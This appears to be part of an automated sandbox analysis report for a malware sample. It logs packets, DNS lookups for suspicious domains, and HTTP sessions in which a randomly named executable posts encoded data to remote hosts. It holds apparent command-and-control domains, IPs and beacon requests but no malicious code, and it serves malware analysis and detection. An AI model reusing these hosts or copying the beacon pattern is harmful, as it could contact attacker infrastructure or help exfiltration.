Nov 24, 2024 08:06:35.925348043 CET	80	49818	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:35.925518036 CET	49818	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:35.942172050 CET	49818	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:36.061708927 CET	80	49818	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:37.451354980 CET	49818	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:37.571089983 CET	80	49818	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:37.571178913 CET	49818	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:38.470077038 CET	49824	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:38.596528053 CET	80	49824	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:38.596607924 CET	49824	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:38.613251925 CET	49824	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:38.732764959 CET	80	49824	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:40.126395941 CET	49824	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:40.129363060 CET	80	49824	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:40.129385948 CET	80	49824	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:40.129467964 CET	49824	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:40.129467964 CET	49824	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:40.245980978 CET	80	49824	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:40.246088982 CET	49824	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:41.142271042 CET	49832	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:41.261779070 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.261934996 CET	49832	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:41.278610945 CET	49832	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:41.398377895 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.398400068 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.398437977 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.398480892 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.398561954 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.398571014 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.398641109 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.398649931 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:41.398674011 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:42.795243025 CET	49832	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:42.915321112 CET	80	49832	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:42.915447950 CET	49832	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:43.819700003 CET	49840	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:43.939279079 CET	80	49840	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:43.939419031 CET	49840	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:43.953239918 CET	49840	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:44.072688103 CET	80	49840	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:45.579416990 CET	80	49840	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:45.579518080 CET	80	49840	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:45.579579115 CET	49840	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:45.582135916 CET	49840	80	192.168.2.4	154.23.184.194
Nov 24, 2024 08:06:45.701636076 CET	80	49840	154.23.184.194	192.168.2.4
Nov 24, 2024 08:06:51.009722948 CET	49857	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:51.129328012 CET	80	49857	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:51.129481077 CET	49857	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:51.146190882 CET	49857	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:51.265794992 CET	80	49857	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:52.402002096 CET	80	49857	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:52.402172089 CET	80	49857	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:52.402250051 CET	49857	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:52.654505968 CET	49857	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:53.673862934 CET	49863	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:53.793576956 CET	80	49863	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:53.795222044 CET	49863	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:53.811377048 CET	49863	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:53.931004047 CET	80	49863	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:55.065120935 CET	80	49863	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:55.065138102 CET	80	49863	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:55.065218925 CET	49863	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:55.326886892 CET	49863	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:56.353589058 CET	49869	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:56.473181009 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.473257065 CET	49869	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:56.494527102 CET	49869	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:56.677073956 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.677086115 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.677094936 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.677098989 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.677107096 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.677115917 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.677124023 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.677131891 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:56.677140951 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:57.858057976 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:57.858377934 CET	80	49869	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:57.858452082 CET	49869	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:57.999957085 CET	49869	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:59.017317057 CET	49876	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:59.136835098 CET	80	49876	209.74.77.108	192.168.2.4
Nov 24, 2024 08:06:59.137048006 CET	49876	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:59.146897078 CET	49876	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:06:59.266516924 CET	80	49876	209.74.77.108	192.168.2.4
Nov 24, 2024 08:07:00.358128071 CET	80	49876	209.74.77.108	192.168.2.4
Nov 24, 2024 08:07:00.358294010 CET	80	49876	209.74.77.108	192.168.2.4
Nov 24, 2024 08:07:00.358359098 CET	49876	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:07:00.361514091 CET	49876	80	192.168.2.4	209.74.77.108
Nov 24, 2024 08:07:00.480992079 CET	80	49876	209.74.77.108	192.168.2.4
Nov 24, 2024 08:07:06.570846081 CET	49894	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:06.690454006 CET	80	49894	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:06.690546989 CET	49894	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:06.734493971 CET	49894	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:06.854075909 CET	80	49894	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:08.187767029 CET	80	49894	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:08.187848091 CET	80	49894	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:08.187910080 CET	49894	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:08.248531103 CET	49894	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:09.355207920 CET	49901	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:09.474756002 CET	80	49901	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:09.474972010 CET	49901	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:09.494127035 CET	49901	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:09.613837957 CET	80	49901	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:10.975737095 CET	80	49901	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:10.975851059 CET	80	49901	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:10.975913048 CET	49901	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:10.998389006 CET	49901	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:12.017575026 CET	49908	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:12.137226105 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.137350082 CET	49908	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:12.159722090 CET	49908	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:12.280621052 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.280653954 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.280709982 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.280739069 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.280853033 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.280880928 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.281016111 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.281044006 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:12.281153917 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:13.670383930 CET	49908	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:13.677743912 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:13.677829981 CET	49908	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:13.790251017 CET	80	49908	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:13.790514946 CET	49908	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:15.064136982 CET	49914	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:15.183840036 CET	80	49914	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:15.187501907 CET	49914	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:15.199160099 CET	49914	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:15.318794012 CET	80	49914	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:16.779777050 CET	80	49914	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:16.779822111 CET	80	49914	35.220.176.144	192.168.2.4
Nov 24, 2024 08:07:16.779995918 CET	49914	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:16.782480955 CET	49914	80	192.168.2.4	35.220.176.144
Nov 24, 2024 08:07:16.901998997 CET	80	49914	35.220.176.144	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2024 08:06:02.840054035 CET	52899	53	192.168.2.4	1.1.1.1
Nov 24, 2024 08:06:03.247189999 CET	53	52899	1.1.1.1	192.168.2.4
Nov 24, 2024 08:06:19.910029888 CET	60850	53	192.168.2.4	1.1.1.1
Nov 24, 2024 08:06:20.483503103 CET	53	60850	1.1.1.1	192.168.2.4
Nov 24, 2024 08:06:35.017832041 CET	53229	53	192.168.2.4	1.1.1.1
Nov 24, 2024 08:06:35.802500963 CET	53	53229	1.1.1.1	192.168.2.4
Nov 24, 2024 08:06:50.595964909 CET	53971	53	192.168.2.4	1.1.1.1
Nov 24, 2024 08:06:51.006983995 CET	53	53971	1.1.1.1	192.168.2.4
Nov 24, 2024 08:07:05.379157066 CET	65420	53	192.168.2.4	1.1.1.1
Nov 24, 2024 08:07:06.379961014 CET	65420	53	192.168.2.4	1.1.1.1
Nov 24, 2024 08:07:06.510998011 CET	53	65420	1.1.1.1	192.168.2.4
Nov 24, 2024 08:07:06.516802073 CET	53	65420	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2024 08:06:02.840054035 CET	192.168.2.4	1.1.1.1	0xb9fb	Standard query (0)	www.1secondlending.one	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:06:19.910029888 CET	192.168.2.4	1.1.1.1	0xbcb6	Standard query (0)	www.logidant.xyz	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:06:35.017832041 CET	192.168.2.4	1.1.1.1	0x99f3	Standard query (0)	www.wcq77.top	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:06:50.595964909 CET	192.168.2.4	1.1.1.1	0x31ef	Standard query (0)	www.mindfulmo.life	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:07:05.379157066 CET	192.168.2.4	1.1.1.1	0x17ad	Standard query (0)	www.bienmaigrir.info	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:07:06.379961014 CET	192.168.2.4	1.1.1.1	0x17ad	Standard query (0)	www.bienmaigrir.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 24, 2024 08:06:03.247189999 CET	1.1.1.1	192.168.2.4	0xb9fb	No error (0)	www.1secondlending.one		43.205.198.29	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:06:20.483503103 CET	1.1.1.1	192.168.2.4	0xbcb6	No error (0)	www.logidant.xyz	logidant.xyz		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:06:20.483503103 CET	1.1.1.1	192.168.2.4	0xbcb6	No error (0)	logidant.xyz		45.141.156.114	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:06:35.802500963 CET	1.1.1.1	192.168.2.4	0x99f3	No error (0)	www.wcq77.top	wcq77.top		CNAME (Canonical name)	IN (0x0001)	false
Nov 24, 2024 08:06:35.802500963 CET	1.1.1.1	192.168.2.4	0x99f3	No error (0)	wcq77.top		154.23.184.194	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:06:51.006983995 CET	1.1.1.1	192.168.2.4	0x31ef	No error (0)	www.mindfulmo.life		209.74.77.108	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:07:06.510998011 CET	1.1.1.1	192.168.2.4	0x17ad	No error (0)	www.bienmaigrir.info		35.220.176.144	A (IP address)	IN (0x0001)	false
Nov 24, 2024 08:07:06.516802073 CET	1.1.1.1	192.168.2.4	0x17ad	No error (0)	www.bienmaigrir.info		35.220.176.144	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.1secondlending.one

www.logidant.xyz

www.wcq77.top

www.mindfulmo.life

www.bienmaigrir.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49742	43.205.198.29	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:03.384186983 CET	452	OUT	GET /alo6/?UH=s1RhBgSSc/k3T0jZ1doZ5DvPRukmOUUc25RslsirlG2uVcm1vZZrQ7zhNnD/cyUNeUvgDkKIi8l9eWRRC/1ChPSgyQz5bywIt0FyKoJ7XnLAe/FH9kjFmmE=&E2ThV=44spoH HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.1secondlending.one User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
Nov 24, 2024 08:06:04.863132954 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:06:04 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49779	45.141.156.114	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:20.621568918 CET	713	OUT	POST /ctvu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 199 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/ctvu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 36 32 53 54 37 57 34 47 55 64 56 76 7a 44 56 46 78 71 42 4d 64 47 41 6c 70 67 70 76 63 51 52 38 78 68 67 6a 62 57 74 37 38 56 70 44 36 68 52 42 65 41 32 47 61 39 6c 64 71 75 6b 62 79 47 5a 4b 51 64 6b 6e 6f 7a 78 54 49 32 36 65 69 43 41 39 68 64 46 77 58 4a 35 52 73 66 4d 45 74 33 77 38 75 6f 74 48 34 44 49 44 62 6d 52 59 44 48 48 70 77 5a 41 44 51 66 52 42 57 57 62 4a 41 33 4c 33 49 66 36 4e 6f 62 51 72 47 41 4f 45 6a 73 43 33 4a 32 72 30 53 4a 6c 74 43 4f 76 56 67 41 54 39 45 65 6c 59 56 34 58 71 72 58 46 68 77 74 6b 4f 48 75 2f 50 47 2b 46 63 78 4f 66 49 68 69 7a 4f 57 51 3d 3d Data Ascii: UH=62ST7W4GUdVvzDVFxqBMdGAlpgpvcQR8xhgjbWt78VpD6hRBeA2Ga9ldqukbyGZKQdknozxTI26eiCA9hdFwXJ5RsfMEt3w8uotH4DIDbmRYDHHpwZADQfRBWWbJA3L3If6NobQrGAOEjsC3J2r0SJltCOvVgAT9EelYV4XqrXFhwtkOHu/PG+FcxOfIhizOWQ==
Nov 24, 2024 08:06:21.979880095 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:06:21 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49788	45.141.156.114	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:23.281595945 CET	733	OUT	POST /ctvu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 219 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/ctvu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 36 32 53 54 37 57 34 47 55 64 56 76 79 69 6c 46 7a 4c 42 4d 4d 32 41 69 71 67 70 76 54 77 52 77 78 68 63 6a 62 53 31 72 38 44 35 44 36 44 5a 42 64 46 43 47 62 39 6c 64 79 2b 6b 61 38 6d 5a 52 51 64 6f 76 6f 79 4e 54 49 32 75 65 69 43 77 39 68 50 74 7a 57 5a 35 54 6c 2f 4d 43 70 33 77 38 75 6f 74 48 34 44 63 70 62 6d 4a 59 43 33 33 70 69 4c 6f 41 54 66 52 43 58 57 62 4a 52 6e 4b 2b 49 66 36 6a 6f 66 52 32 47 47 4b 45 6a 74 79 33 49 6e 72 33 59 4a 6b 6d 66 65 75 65 70 53 2b 78 43 4d 77 34 63 70 37 46 72 7a 52 36 34 4c 70 55 57 66 65 59 55 2b 68 76 73 4a 57 38 73 68 4f 48 4e 57 5a 2f 4a 67 69 2f 76 6d 6b 76 70 59 49 6c 30 44 2b 4f 47 6a 4d 3d Data Ascii: UH=62ST7W4GUdVvyilFzLBMM2AiqgpvTwRwxhcjbS1r8D5D6DZBdFCGb9ldy+ka8mZRQdovoyNTI2ueiCw9hPtzWZ5Tl/MCp3w8uotH4DcpbmJYC33piLoATfRCXWbJRnK+If6jofR2GGKEjty3Inr3YJkmfeuepS+xCMw4cp7FrzR64LpUWfeYU+hvsJW8shOHNWZ/Jgi/vmkvpYIl0D+OGjM=
Nov 24, 2024 08:06:24.637145042 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Nov 2024 07:06:24 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49796	45.141.156.114	80	5820	C:\Program Files (x86)\QCqENdDfSutnTlOplYyiaZQHrlZbrRValXbhiJfzVOFIyEjLHapTUgOcLbQWASdVRPjJIpMmvwc\KzlgpZBFalChd.exe

Timestamp	Bytes transferred	Direction	Data
Nov 24, 2024 08:06:25.949848890 CET	10815	OUT	POST /ctvu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Length: 10299 Connection: close Content-Type: application/x-www-form-urlencoded Host: www.logidant.xyz Origin: http://www.logidant.xyz Referer: http://www.logidant.xyz/ctvu/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729) Data Raw: 55 48 3d 36 32 53 54 37 57 34 47 55 64 56 76 79 69 6c 46 7a 4c 42 4d 4d 32 41 69 71 67 70 76 54 77 52 77 78 68 63 6a 62 53 31 72 38 44 78 44 36 32 56 42 65 69 65 47 4b 4e 6c 64 73 75 6b 48 38 6d 5a 63 51 64 77 6a 6f 79 42 70 49 31 57 65 6b 51 34 39 30 4f 74 7a 66 5a 35 54 36 76 4d 44 74 33 78 6d 75 6f 38 41 34 44 4d 70 62 6d 4a 59 43 31 76 70 68 5a 41 41 56 66 52 42 57 57 62 56 41 33 4c 62 49 66 79 56 6f 66 63 42 48 33 32 45 6a 4e 69 33 46 31 44 33 46 5a 6b 6b 63 65 76 65 70 53 7a 7a 43 4d 73 4b 63 70 2f 76 72 30 35 36 37 74 73 30 48 62 53 63 58 34 78 79 34 59 71 38 73 68 71 32 55 78 52 63 46 54 69 52 37 6c 6f 38 69 37 78 41 74 57 6d 47 62 44 4e 64 78 56 62 4e 64 69 6a 67 62 30 56 66 64 33 73 4e 62 4a 79 4e 73 34 63 4f 6a 33 74 77 75 6e 43 78 6e 77 6f 70 44 56 2f 72 51 31 2b 31 56 6e 4c 76 48 46 6d 37 47 36 48 4a 4e 4d 2f 57 48 46 61 4c 77 54 4b 74 4a 6e 7a 65 71 6e 73 70 7a 36 64 75 66 68 4a 30 71 4b 58 30 48 66 71 52 61 67 36 59 6c 58 4b 64 4f 47 44 6d 55 37 79 70 6f 6f 6e 36 6f 7a 56 77 72 32 62 [TRUNCATED] Data Ascii: UH=62ST7W4GUdVvyilFzLBMM2AiqgpvTwRwxhcjbS1r8DxD62VBeieGKNldsukH8mZcQdwjoyBpI1WekQ490OtzfZ5T6vMDt3xmuo8A4DMpbmJYC1vphZAAVfRBWWbVA3LbIfyVofcBH32EjNi3F1D3FZkkcevepSzzCMsKcp/vr0567ts0HbScX4xy4Yq8shq2UxRcFTiR7lo8i7xAtWmGbDNdxVbNdijgb0Vfd3sNbJyNs4cOj3twunCxnwopDV/rQ1+1VnLvHFm7G6HJNM/WHFaLwTKtJnzeqnspz6dufhJ0qKX0HfqRag6YlXKdOGDmU7ypoon6ozVwr2b+rMGre8ET14LaCxVLkBvFJSYMB7rhCyFizS7iM0UiJneItxN7cr3YOLJyl/8CPuDM6bNZyVuEeDZZKbOOwa3FqjZ4sZwo/OzsRMUtre44dMeFRCqnSwmUynyW137G4u3POoIYa10UIkhOX4THIJ7vTcbDIwgK6F8alOVFnNsukvE3ZJzBm/8BKHfsIRJlPb0UqjVYlA3EPO4eQxlwrFOJiW+QpsyFTib0XdY4LPk4WcLEZYqFmqnF99qleNy/8hva7FZNoxDoZ/QvVCHZ4QsWzhR1wB9MbuSf9ip1U+3vNHpOtBAkxUwlEzSsUdfp3D+BOGSVqt80lLFRY8r6CMKCq/vjQ8qDIYb4F2HPiUIQDg70Q3zI6rsIMr6WKRJsocUXcTI17YIizQoBapsaJMWq3fUvzpd8IeJkzSmfh7V/F3oRTaYWfLXFW+gk/NhP16UBVuLvbxHAy74XAjf5A6SNmfu6rO3YAg1x2BQGc269kgN5t1rrIXFX9q3dC6PkgtoM0lzZTdqwDKwWG0QyCIQyy8a8oxwAOdoPxEOWIKMRcG6k6grghrJMpzgSzJDpFNXix1rn3JWMiPDNtkutY3xcO6hoO4vE06MYMfjJG9uqFnU75mtbLGGhVP6PvH92r75Py3XMmn7LeZkt0Wga20ScwqohpFEk5ho3C [TRUNCATED]
